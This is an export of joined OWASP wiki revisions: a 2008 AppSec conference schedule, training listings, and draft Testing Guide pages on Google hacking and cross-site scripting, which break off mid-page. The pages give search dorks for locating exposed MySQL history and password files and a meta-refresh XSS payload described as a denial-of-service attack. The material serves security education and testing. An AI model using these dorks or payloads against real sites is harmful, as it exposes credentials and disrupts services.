''Prof. Li-Chiou Chen & Chienitng Lin, [http://www.pace.edu/page.cfm?doc_id=16399 Pace Univ]''<br />
| style="width:30%; background:#BCA57A" align="left" | Http Bot Research<br />
''[http://www.shadowserver.org/wiki/pmwiki.php?n=Shadowserver.Mission Andre M. DiMino - ShadowServer Foundation]''<br />
| style="width:30%; background:#99FF99" align="left" | MalSpam Research <br />
'' [http://www.knujon.com/bios.html Garth Bruen]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference/ctf Capture the Flag] Sign-Up<br />
''LUNCH - Provided by event sponsors @ TechExpo''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-12:30 || style="width:30%; background:#BC857A" align="left" | e-Gateway<br />
''[http://www.linkedin.com/in/tommyryan Tom Ryan]''<br />
| style="width:30%; background:#BCA57A" align="left" | Framework-level Threat Analysis: Adding Science to the Art of Source-code review<br />
''Nishchal Bhalla''<br />
| style="width:30%; background:#99FF99" align="left" | Automated Web-based Malware Behavioral Analysis <br />
'' Tyler Hudak''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:45 || style="width:30%; background:#BC857A" align="left" | Offensive Assessing Financial Applications<br />
'' [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference-daniel-cuthbert Daniel Cuthbert]''<br />
| style="width:30%; background:#BCA57A" align="left" | WAF ModSecurity<br />
''[http://www.thinkingstone.com/about/ivan-ristic.html Ivan Ristic]''<br />
| style="width:30%; background:#99FF99" align="left" | OWASP & NYC<br />
''[http://www.linkedin.com/in/davidstern2000 David Stern]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:00-14:45 || style="width:30%; background:#BC857A" align="left" | Logic Attacks and Inefficiencies of Robotic Detection<br />
''[http://ha.ckers.org/blog/about Robert "RSnake" Hansen], CEO SecTheory''<br />
| style="width:30%; background:#BCA57A" align="left" | Reverse Engineering .NET <br />
''Adam Boulton''<br />
| style="width:30%; background:#99FF99" align="left" | JBroFuzz 0.1 - 1.1: Building a Java Fuzzer for the Web <br />
''[http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference-SPEAKER-Yiannis_Pavlosoglou Yiannis Pavlosoglou]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:45 || style="width:30%; background:#BC857A" align="left" |Industry Panel w/ Jennifer Bayuk CISO Bear Stearns, Mark Clancy EVP CitiGroup, Jim Routh CISO DTCC, Sunil Seshadri CISO NYSE-Euronet, Warren Axelrod SVP Bank of America, Joe Bernik Royal Bank of Scotland & Philip Venables CIRO, Goldman, Sachs<br />
| style="width:30%; background:#BCA57A" align="left" | [http://www.owasp.org/index.php/Wild_Wild_Web_on_Security_Planet Wild Wild Web on Security Planet]<br />
''[http://www.expresscertifications.com/company/execmgt.aspx Mano Paul] CEO Express Certifications''<br />
| style="width:30%; background:#99FF99" align="left" |[http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference-SPEAKER-GunterOllmann Multidisciplinary Bank Attacks]<br />
''Gunter Ollmann''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:00-16:45 || style="width:30%; background:#BC857A" align="left" | OWASP Enterprise Security API [http://www.owasp.org/index.php/ESAPI (ESAPI) Project]<br />
'' [http://www.aspectsecurity.com/management.htm Jeff Williams] & Jim Manico''<br />
| style="width:30%; background:#BCA57A" align="left" | Shootout @ Blackbox Corral<br />
''Larry Suto ''<br />
| style="width:30%; background:#99FF99" align="left" | 80% 10% 10%<br />
'' [http://www.blogger.com/profile/07177656204885181542 Andy Steingruebl], Security @ PayPal''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:00-17:45 || style="width:30%; background:#BC857A" align="left" | Threading the Needle:<br />
<br />
Bypassing web application/service security controls using Encoding, Transcoding, Filter Evasion, and other Canonicalization Attacks<br />
'' [http://www.linkedin.com/in/arianevans Arian Evans]''<br />
| style="width:30%; background:#BCA57A" align="left" |Shhhh Don’t Tell Anybody <br />
''[http://www.linkedin.com/in/ppetkov Petko D. Petkov]''<br />
| style="width:30%; background:#99FF99" align="left" | [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference-SPEAKER-Andres_Riancho W3AF Open Source App Scanner]<br />
''Andres Riancho''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 18:00-18:45 || style="width:30%; background:#BC857A" align="left" | [http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project OWASP Live CD]<br />
'' [http://www.linkedin.com/in/packetfocus Joshua Perrymon]''<br />
| style="width:30%; background:#BCA57A" align="left" | Coding Secure w/PHP<br />
''[http://www.linkedin.com/in/zaunere Hans Zaunere]''<br />
| style="width:30%; background:#99FF99" align="left" | [http://www.owasp.org/index.php/Payment_Card_Data_Security_and_the_new_Enterprise_Java Payment Card Data Security and the new Enterprise Java]<br />
''Dr. B. V. Kumar & Mr. Abhay Bhargav''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 20:00-23:00 || colspan="3" style="width:80%; background:#C2C2C2" align="center" | OWASP NYC AppSec 2008 VIP Party<br />
''Location: TBD''<br />
|-<br />
! colspan="10" align="center" style="background:#4058A0; color:white" | Day 2 – Sept 25th, 2008 <br />
|-<br />
| style="width:10%; background:#99FF99" | 08:00-10:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | BREAKFAST - Provided by event sponsors @ TechExpo<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:00-08:45 || style="width:30%; background:#BC857A" align="left" | State of the Union<br />
''[http://www.aeispeakers.com/speakerbio.php?SpeakerID=1192 Prof. Howard A. Schmidt, CISSP, CISM (Hon.)] Current (ISC)² Security Strategist and Former White House Cyber Security Advisor''<br />
| style="width:30%; background:#BCA57A" align="left" | Best Practices Guide: Web Application Firewalls<br />
''Dr. Georg Hess''<br />
| style="width:30%; background:#99FF99" align="left" | The Good The Bad and The Ugly - Pen Testing VS. Source Code Analysis<br />
''[www.linkedin.com/in/tommyryan Thomas Ryan]''<br />
<br />
<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:00-09:45 || style="width:30%; background:#BC857A" align="left" | Good vs. Evil JavaScript<br />
''[http://jeremiahgrossman.blogspot.com Jeremiah Grossman]''<br />
| style="width:30%; background:#BCA57A" align="left" | OWASP V2 Testing Guide 4.2.3 Spidering and Googling in depth <br />
''[http://www.linkedin.com/in/ChristianHeinrich Christian Heinrich]''<br />
| style="width:30%; background:#99FF99" align="left" | OWASP Web Services Top Ten<br />
''[http://1raindrop.typepad.com Gunnar Peterson]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:45 || style="width:30%; background:#BC857A" align="left" | OWASP Update <br />
''Dinis Cruz/Jeff Williams + Surprise Guest''<br />
| style="width:30%; background:#BCA57A" align="left" | Help Wanted 7 Things You Need to Know APPSEC/INFOSEC Employment<br />
''[http://www.linkedin.com/pub/0/29/685 Lee Kushner]''<br />
| style="width:30%; background:#99FF99" align="left" | APPSEC Industry Analysts<br />
''Speaker TBD''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:00-11:45 || style="width:30%; background:#BC857A" align="left" | [http://www.owasp.org/index.php/Category:OWASP_CLASP_Project CLASP (Comprehensive, Lightweight Application Security Process)]<br />
''Pravir Chandra''<br />
| style="width:30%; background:#BCA57A" align="left" | Next Generation Cross Site Scripting Worms <br />
''[http://i8jesus.com/?page_id=5 Arshan Dabirsiaghi]''<br />
| style="width:30%; background:#99FF99" align="left" | Secure Software Impact<br />
''[http://ouncelabs.com/company/team.asp Jack Danahy]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-12:45 || style="width:30%; background:#BC857A" align="left" | Security in Agile Development<br />
''[http://www.owasp.org/index.php/User:Wichers Dave Wichers]''<br />
| style="width:30%; background:#BCA57A" align="left" | Security of Software-as-a-Service (SaaS)<br />
''[http://www.linkedin.com/pub/6/372/45a James Landis]''<br />
| style="width:30%; background:#99FF99" align="left" | [http://reversebenchmarking.com/About.html Open Reverse Benchmarking Project]<br />
''Marce Luck & [http://www.linkedin.com/pub/1/507/616 Tom Stracener]''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | [http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference/ctf Capture the Flag] Status<br />
''LUNCH - Provided @ TechExpo''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:45 || style="width:30%; background:#BC857A" align="left" | Security Research Report<br />
''[http://www.linkedin.com/pub/5/742/233 Dinis Cruz]''<br />
| style="width:30%; background:#BCA57A" align="left" | [http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project Pantera Advances]<br />
''[http://www.linkedin.com/pub/1/598/855 Simon Roses Femerling]''<br />
| style="width:30%; background:#99FF99" align="left" | Lotus Notes Insecurity <br />
''Jian Hui Wang''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:00-14:45 || style="width:30%; background:#BC857A" align="left" | Practical Advanced Threat Modeling<br />
''John Steven''<br />
| style="width:30%; background:#BCA57A" align="left" | [http://www.owasp.org/index.php/Category:OWASP_Orizon_Project Owasp Orizon]<br />
''Paolo Perego''<br />
| style="width:30%; background:#99FF99" align="left" | Building Usable Security<br />
''Zed Abbadi''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:45 || style="width:30%; background:#BC857A" align="left" | [http://www.owasp.org/index.php/Input_validation:_the_Good%2C_the_Bad_and_the_Ugly Input validation: the Good, the Bad and the Ugly]<br />
''Johan Peeters''<br />
| style="width:30%; background:#BCA57A" align="left" | Off-shoring Application Development? Security is Still Your Problem<br />
''Rohyt Belani''<br />
| style="width:30%; background:#99FF99" align="left" | NIST SAMATE Static Analysis Tool Exposition (SATE)<br />
''Vadim Okun''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:00-16:45 || style="width:30%; background:#BC857A" align="left" | Vulnerabilities in application interpreters and runtimes<br />
''Erik Cabetas''<br />
| style="width:30%; background:#BCA57A" align="left" | Flash Parameter Injection (FPI)<br />
''Ayal Yogev & Adi Sharabani''<br />
| style="width:30%; background:#99FF99" align="left" | Cross-Site Scripting Filter Evasion<br />
''Alexios Fakos''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:00-17:45 || colspan="3" style="width:80%; background:#C2C2C2" align="center" | '''Wizdom of Crowds / CTF Awards & Raffles'''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 18:30-19:30 || colspan="3" style="width:80%; background:#C2C2C2" align="center" | OWASP Foundation, Chapter Leader Meeting<br />
|}<br />
<br />
<br />
<center>[http://guest.cvent.com/i.aspx?4W,M3,828ca6d1-1b60-4105-8034-d344700e6956 http://www.owasp.org/images/7/7f/Register.gif]</center><br />
<br />
== Technology Pavilion - September 24th and 25th ==<br />
<br />
Want to see the latest offerings from technology product and service firms, visit the Technology Pavilion. On September 24th and 25th. 2 full days of exhibits by service providers and manufacturers from around the world.<br />
<br />
Do you want to preview the event space [http://www.flickr.com/photos/21550725@N04/sets/72157604662279903/detail Click Here]<br />
<br />
<hr><br />
<br />
== [http://www.owasp.org/index.php/Category:OWASP_AppSec_Conference_Training OWASP NYC AppSec 2008 Training Courses - September 22nd and 23rd, 2008] ==<br />
{| style="width:80%" border="0" align="center"<br />
! align="center" style="background:#4058A0; color:white" | T1. Defensive Programming - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | This class will teach you how to program defensively. A must for developers, managers, testers and security professionals. Learn the latest techniques to build attack resistant code, protect from current and future vulnerabilities and how to secure an application from both implementation bugs and design flaws. The instructor Pravir Chandra is well known security expert, project lead for OWASP CLASP project and former co-founder & CTO of secure software [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
Instructor: Jason Rouse, Sr. Consultant, [http://www.cigital.com/training/series http://www.owasp.org/images/b/be/Cigital_OWASP.GIF]''' <br />
|-<br />
{| style="width:80%" border="0" align="center"<br />
! align="center" style="background:#4058A0; color:white" | T2. Secure Coding for Java EE - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | This course is similar to Aspect's Building and Testing Secure Web Applications except it includes a significant amount of Java focused content, including:<br />
# Java EE security overview,<br />
# All coding examples and recommendations are specifically focused on Java and Java servers, and<br />
# 3 additional hands on coding labs where the students find and then fix security vulnerabilities in a Java EE application developed for the class.<br />
<br />
[[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
Instructor: This tutorial is provided by longtime OWASP contributor: [http://www.aspectsecurity.com http://www.owasp.org/images/d/d1/Aspect_logo.gif]<br />
'''<br />
|-<br />
! align="center" style="background:#4058A0; color:white" | T3. Web Services and XML Security - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | The movement towards Web Services and Service Oriented architecture (SOA) paradigms requires new security paradigms to deal with new risks posed by these architectures. This session takes a pragmatic approach towards identifying Web Services security risks and selecting and applying countermeasures to the application, code, web servers, databases, application, and identity servers and related software. [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
Instructor: Gunnar Peterson''' [http://www.arctecgroup.net https://www.owasp.org/images/b/bf/Arctec.jpg]<br />
|-<br />
! align="center" style="background:#4058A0; color:white" | T4. Advanced Web Application Security Testing - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | Course Overview While all developers need to know the basics of web application security testing, application security specialists will want to know all the advanced techniques for finding and diagnosing security problems in applications. Aspect’s Advanced Web Application Security Testing training is based on a decade of work verifying the security of critical applications. The course is taught by an experienced application security practitioner in an interactive manner. [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
Instructor: This tutorial is provided by longtime OWASP contributor: [http://www.aspectsecurity.com http://www.owasp.org/images/d/d1/Aspect_logo.gif]'''<br />
|-<br />
! align="center" style="background:#4058A0; color:white" | T5. Leading the Development of Secure Applications 1-Day - Sept 22nd- $675<br />
|-<br />
| style="background:#F2F2F2" | In this one-day management session you’ll get the answers to the ten key questions that most CIOs and development managers face when trying to improve security in the development process. The course provides proven techniques and valuable lessons learned that can be applied to projects at any phase of their application’s lifecycle. [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
Instructor: This tutorial is provided by longtime OWASP contributor: [http://www.aspectsecurity.com http://www.owasp.org/images/d/d1/Aspect_logo.gif]'''<br />
|-<br />
! align="center" style="background:#4058A0; color:white" | T7. Encryption Programming Using SKSML - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | Application developers are increasingly required to protect sensitive data through encryption. While there are many libraries that can assist with cryptography, there are few to none that focus on encryption key management.<br />
<br />
This class will introduce you to an OASIS standards protocol - Symmetric Key Services Markup Language (SKSML) - and show you how it can be used to securely encrypt sensitive data and manage encryption keys across the enterprise. [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
Instructor: Arshad Noor, CTO, StrongAuth Inc.''' [http://www.strongauth.com https://www.owasp.org/images/8/86/StrongAuth.jpg]<br />
|-<br />
{| style="width:80%" border="0" align="center"<br />
! align="center" style="background:#4058A0; color:white" | T8. Writing Secure Code ASP.NET - 2-Days - $1350<br />
|-<br />
| style="background:#F2F2F2" | Understand the key security features of the .NET platform, the common web security pitfalls developers make, and how to build secure and reliable web applications using ASP.NET. Students are lead through hands on code examples that highlight issues and prescribe solutions. [[:Category:OWASP_AppSec_Conference_Training | Learn More Here]]<br />
<br />
The instructors are Foundstone's Technical Director, Rudolph Araujo and Foundstone's Professional Services Conlultant, Alex Smolen. [http://www.foundstone.com/us/education-overview.asp https://www.owasp.org/images/2/26/Foundstone.jpg]<br />
|}<br />
<center>[http://guest.cvent.com/i.aspx?4W,M3,828ca6d1-1b60-4105-8034-d344700e6956 https://www.owasp.org/images/7/7f/Register.gif]</center><br />
<br />
<h2> HOTELS / TRAVEL </h2><br />
[http://maps.google.com/maps?near=Pace+Plz,+New+York,+NY+10038+(Pace+University+New+York+Cmps)&geocode=15467452012610799558,40.711640,-74.005820&q=hotel&f=l&dq=Pace+University-New+York&ie=UTF8&z=15&om=0 Hotels in the area of the event]<br />
<br />
New York City MTA: http://www.mta.nyc.ny.us/nyct/index.html<br />
<br />
New York City Subway & walking directions: http://www.hopstop.com/?city=newyork<br />
<br />
New York Sights & Sounds - SightsSounds<br />
<br />
New York City Travel Guide - http://www.nytoday.com/<br />
<br />
New York City Attractions - http://www.nycvisit.com<br />
<br />
New York TV Show Tickets - Get free tickets to TV shows! - http://www.nytix.com/<br />
<br />
New York City local news: http://www.ny1news.com<br />
<br />
<h2>EVENT SPONSORSHIP </h2>The OWASP Conferences & Training security technologists including CSOs,admins, application admins, MIS directors, homeland defense chiefs. These important influencers drive buying decisions exclusive access to its audiences. OWASP has established strategic relationships with security—print publications, newsletters, portals, consultants,message—and leadership positioning OWASP events. OWASP’s mission is supported by organizations who share our application, and software security communities. This approach should be part of your mix.<br />
<br />
<b>[https://www.owasp.org/images/6/66/NY_Sponsorship_Form_update_%282%29.pdf Sponsorship Opportunities]- Register online: [http://guest.cvent.com/i.aspx?4W,M3,09e3b490-ba93-4474-851e-be803b1a01c2 click here]</b></div>TomRyanhttps://wiki.owasp.org/index.php?title=Testing:_Spidering_and_googling&diff=13861Testing: Spidering and googling2006-11-30T15:28:28Z<p>TomRyan: /* References */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
<br><br />
Web spiders are the most powerful and useful tools developed for both good and bad intentions on the Internet. A spider serves one major function, Data Mining. The way a typical spider (like Google) works is by crawling a website one page at a time and gathering and storing the relevant information such as email address, meta-tags, hidden form data, URL information, links and so much more. Then the spider crawls all the links in that page, collecting relevant information in each following page, and so on. Before you know it the spider has crawled thousands of links and pages gathering bits of information and storing into a database. This web of paths is where the term 'spider' is derived from. <br />
<br />
The Google search engine found at http://www.google.com offers many features, including language and document translation; web, image, newsgroups, catalog, and news searches; and more. These features offer obvious benefits to even the most uninitiated web surfer, but these same features offer far more nefarious possibilities to the most malicious Internet users, including hackers, computer criminals, identity thieves, and even terrorists. This article outlines the more harmful applications of the Google search engine, techniques that have collectively been termed "Google Hacking."<br />
<br />
<br><br />
<br />
== Description of the Issue == <br />
<br />
In 1992, there was about 15,000 websites, now in 2006 the number has exceeded 100 million. What if a simply query to a search engine such as Google such as "Hackable Websites w/ Credit Card Information" produced a list of websites that contained customer credit card data of thousands of customers per company. <br />
<br />
If the attacker was aware of a web application that perhaps utilized a clear text password file in a directory and wanted to gather these targets you could search on "intitle:"Index of" .mysql_history" and found on any of the 100 million websites will provide you with a list of the database usernames and passwords OR maybe the attacker has a new method to attack a Lotus Notes web server and he wants to simply see how many targets are on the Internet, he could search "inurl:domcfg.nsf". Apply the same logic to a worm looking for its new victim.<br />
<br />
<br><br />
<b> ADVANCED SEARCH 101 w/Google</b><br />
<br />
Use the plus sign (+) to force a search for an overly common word. Use the minus sign (-) to exclude a term from a search. No space follows these signs.<br />
<br />
To search for a phrase, supply the phrase surrounded by double quotes (" ").<br />
<br />
A period (.) serves as a single-character wildcard.<br />
<br />
An asterisk (*) represents any word—not the completion of a word, as is traditionally used.<br />
<br />
Google advanced operators help refine searches. Advanced operators use a syntax such as the following:<br />
<br />
operator:search_term<br />
<br />
Notice that there's no space between the operator, the colon, and the search term.<br />
<br />
The site: operator instructs Google to restrict a search to a specific web site or domain. The web site to search must be supplied after the colon.<br />
<br />
The filetype: operator instructs Google to search only within the text of a particular type of file. The file type to search must be supplied after the colon. Don't include a period before the file extension.<br />
<br />
The link: operator instructs Google to search within hyperlinks for a search term.<br />
<br />
The cache: operator displays the version of a web page as it appeared when Google crawled the site. The URL of the site must be supplied after the colon.<br />
<br />
The intitle: operator instructs Google to search for a term within the title of a document.<br />
<br />
The inurl: operator instructs Google to search only within the URL (web address) of a document. The search term must follow the colon.<br />
<br />
<b>Site Mapping</b><br />
<br />
To find every web page Google has crawled for a specific site, use the site: operator. Consider the following query: site:http://www.owasp.org or if you wanted to see who links to the OWASP webpage you could do a link:http://www.owasp.org<br />
<br />
== Black Box testing and example ==<br />
'''Testing for Topic X vulnerabilities:''' <br><br />
Social Engineering combined with a Spider/Google search - In Progress<br />
<br />
<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== Gray Box testing and example == <br />
'''Testing for Topic X vulnerabilities:'''<br><br />
-INPROGRESS PLACEHOLDER<br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== References ==<br />
'''Whitepapers'''<br><br />
Johnny Long - http://johnny.ihackstuff.com<br />
...<br><br />
'''Tools'''<br><br />
Google – http://www.google.com<br><br />
NTOInsight - http://www.ntobjectives.com/freeware/index.php<br><br />
Burp Spider - http://portswigger.net/spider/<br><br />
<br />
...<br><br />
<br />
{{Category:OWASP Testing Project AoC}}</div>TomRyanhttps://wiki.owasp.org/index.php?title=Testing:_Spidering_and_googling&diff=13860Testing: Spidering and googling2006-11-30T15:27:02Z<p>TomRyan: /* Brief Summary */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
<br><br />
Web spiders are the most powerful and useful tools developed for both good and bad intentions on the Internet. A spider serves one major function, Data Mining. The way a typical spider (like Google) works is by crawling a website one page at a time and gathering and storing the relevant information such as email address, meta-tags, hidden form data, URL information, links and so much more. Then the spider crawls all the links in that page, collecting relevant information in each following page, and so on. Before you know it the spider has crawled thousands of links and pages gathering bits of information and storing into a database. This web of paths is where the term 'spider' is derived from. <br />
<br />
The Google search engine found at http://www.google.com offers many features, including language and document translation; web, image, newsgroups, catalog, and news searches; and more. These features offer obvious benefits to even the most uninitiated web surfer, but these same features offer far more nefarious possibilities to the most malicious Internet users, including hackers, computer criminals, identity thieves, and even terrorists. This article outlines the more harmful applications of the Google search engine, techniques that have collectively been termed "Google Hacking."<br />
<br />
<br><br />
<br />
== Description of the Issue == <br />
<br />
In 1992, there was about 15,000 websites, now in 2006 the number has exceeded 100 million. What if a simply query to a search engine such as Google such as "Hackable Websites w/ Credit Card Information" produced a list of websites that contained customer credit card data of thousands of customers per company. <br />
<br />
If the attacker was aware of a web application that perhaps utilized a clear text password file in a directory and wanted to gather these targets you could search on "intitle:"Index of" .mysql_history" and found on any of the 100 million websites will provide you with a list of the database usernames and passwords OR maybe the attacker has a new method to attack a Lotus Notes web server and he wants to simply see how many targets are on the Internet, he could search "inurl:domcfg.nsf". Apply the same logic to a worm looking for its new victim.<br />
<br />
<br><br />
<b> ADVANCED SEARCH 101 w/Google</b><br />
<br />
Use the plus sign (+) to force a search for an overly common word. Use the minus sign (-) to exclude a term from a search. No space follows these signs.<br />
<br />
To search for a phrase, supply the phrase surrounded by double quotes (" ").<br />
<br />
A period (.) serves as a single-character wildcard.<br />
<br />
An asterisk (*) represents any word—not the completion of a word, as is traditionally used.<br />
<br />
Google advanced operators help refine searches. Advanced operators use a syntax such as the following:<br />
<br />
operator:search_term<br />
<br />
Notice that there's no space between the operator, the colon, and the search term.<br />
<br />
The site: operator instructs Google to restrict a search to a specific web site or domain. The web site to search must be supplied after the colon.<br />
<br />
The filetype: operator instructs Google to search only within the text of a particular type of file. The file type to search must be supplied after the colon. Don't include a period before the file extension.<br />
<br />
The link: operator instructs Google to search within hyperlinks for a search term.<br />
<br />
The cache: operator displays the version of a web page as it appeared when Google crawled the site. The URL of the site must be supplied after the colon.<br />
<br />
The intitle: operator instructs Google to search for a term within the title of a document.<br />
<br />
The inurl: operator instructs Google to search only within the URL (web address) of a document. The search term must follow the colon.<br />
<br />
<b>Site Mapping</b><br />
<br />
To find every web page Google has crawled for a specific site, use the site: operator. Consider the following query: site:http://www.owasp.org or if you wanted to see who links to the OWASP webpage you could do a link:http://www.owasp.org<br />
<br />
== Black Box testing and example ==<br />
'''Testing for Topic X vulnerabilities:''' <br><br />
Social Engineering combined with a Spider/Google search - In Progress<br />
<br />
<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== Gray Box testing and example == <br />
'''Testing for Topic X vulnerabilities:'''<br><br />
-INPROGRESS PLACEHOLDER<br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== References ==<br />
'''Whitepapers'''<br><br />
Johnny Long - http://johnny.ihackstuff.com<br />
...<br><br />
'''Tools'''<br><br />
...<br><br />
<br />
{{Category:OWASP Testing Project AoC}}</div>TomRyanhttps://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&diff=13664Testing for Cross site scripting2006-11-24T19:37:49Z<p>TomRyan: /* Gray Box testing and example */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
Cross Site Scripting is one of the most common application level attacks. Many times people will look at a Cross Site Scripting (also known as XSS, CSS was avoided not to confuse people with Cascade Styling Sheets) attack and say WOW you made a JavaScript popup window, but how does this effect me?<br />
<br />
Cross Site Scripting vulnerabilities are essentially code injection attacks. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases Cross Site Scripting vulnerabilities can even perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.<br />
<br />
Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities, DOM-Based, Stored and Reflected.<br />
<br />
== Description of the Issue ==<br />
<br />
Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate the user. - Identity theft!<br />
<br />
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross-Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide-range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the <Script> tag. Typically, XSS attacks involve malicious JavaScript, but it can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.<br />
Cross site scripting is used in many Phishing attacks.<br />
<br />
<br />
The '''DOM-based Cross-Site Scripting''' problem exists within a page's client-side script itself. If the JavaScript accesses a URL request parameter (an example would be an RSS feed) and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS vulnerability will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side script.<br />
Exploiting such a hole would be very similar to the exploit of Reflected XSS vulnerabilities , except in one very important situation. <br />
<br />
An example would be, if an attacker hosts a malicious website, which contains a link to a vulnerable page on a client's local system, a script could be injected and would run with privileges of that user's browser on their system. This bypasses the entire client-side sandbox, not just the cross-domain restrictions that are normally bypassed with XSS exploits.<br />
<br />
<br />
The '''Reflected Cross-Site Scripting''' vulnerability is bar far the most common and well know type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.<br />
<br />
At first glance, this does not appear to be a serious problem since users can only inject code into their own pages. However, with a small amount of social engineering, an attacker could convince a user to follow a malicious URL which injects code into the results page, giving the attacker full access to that page's content. Due to the general requirement of the use of some social engineering in this case (and normally in DOM-Based XSS vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS) and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities. The simplest way to show the importance of a XSS vulnerability would be to perform a Denial of Service attack.<br />
In some cases a denial of service attack can be performed on the server by doing the Following: <br />
article.php?title=<meta%20http-equiv="refresh"%20content="0;"><br />
<br />
This makes a refresh request roughly about every .3 seconds to particular page. It then acts like an infinite loop of refresh requests potentially bringing down the web and database server by flooding it with requests. The more browser sessions that are open, the more intense the attack becomes. <br />
<br />
The '''Stored Cross Site Scripting''' vulnerability, is the most powerful kinds of XSS attacks. A Stored XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities. A real life example of this would be SAMY, the XSS vulnerability found on MySpace in October of 2005.<br />
These vulnerabilities are more significant than other types because an attacker can inject the script just once. This could potentially hit a large number of other users with little need for social engineering or the web application could even be infected by a cross-site scripting virus.<br />
<br />
The methods of injection can vary a great deal. A perfect example of how this type of an attack could impact an organization, instead of an individual, was demonstrated by Jeremiah Grossman @ BlackHat USA 2006. The demonstration gave an example of how if you posted a stored XSS script to a popular blog, newspaper or page comments section of a website, all the visitors of that page would have their internal networks scanned and logged for a particular type of vulnerability.<br />
<br />
==Black Box testing and example==<br />
<br />
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:<BR><br />
<br />
